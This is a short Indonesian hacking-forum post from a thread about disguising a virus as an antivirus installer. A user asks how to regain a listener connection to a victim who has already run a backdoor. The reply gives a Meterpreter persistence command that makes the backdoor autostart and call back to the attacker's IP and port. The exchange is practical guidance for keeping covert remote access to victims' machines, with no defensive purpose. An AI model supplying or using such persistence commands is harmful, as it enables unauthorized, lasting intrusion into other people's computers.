[Share] Menyamarkan virus pada Antivirus Installer
#47
(03-10-2015, 04:21 PM)Psytrap Wrote: Om mau nanya kalo misalkan nih ya tuh file backdoor udah di klik orang sekali nah kita mau listenernya besok-besok aja bisa gak om selama dia konek ke internet?  ada tutor tambahan om? apa gimana ya om tulung om tulung hehe :3 caranya biar bisa listener lagi tanpa dia klik file backdoor kita lagi gimana om?

oh mungkin maksudnya biar jadi starup ya backdoornya?, nih tambahin aja sebelum exit console "run persistence -U i 5 -p (port) -r ( ip kita)"

semoga bermanfaat


Messages In This Thread
RE: Menyamarkan virus pada Antivirus Installer - by ch1nk - 05-16-2015, 03:28 AM



Users browsing this thread: 1 Guest(s)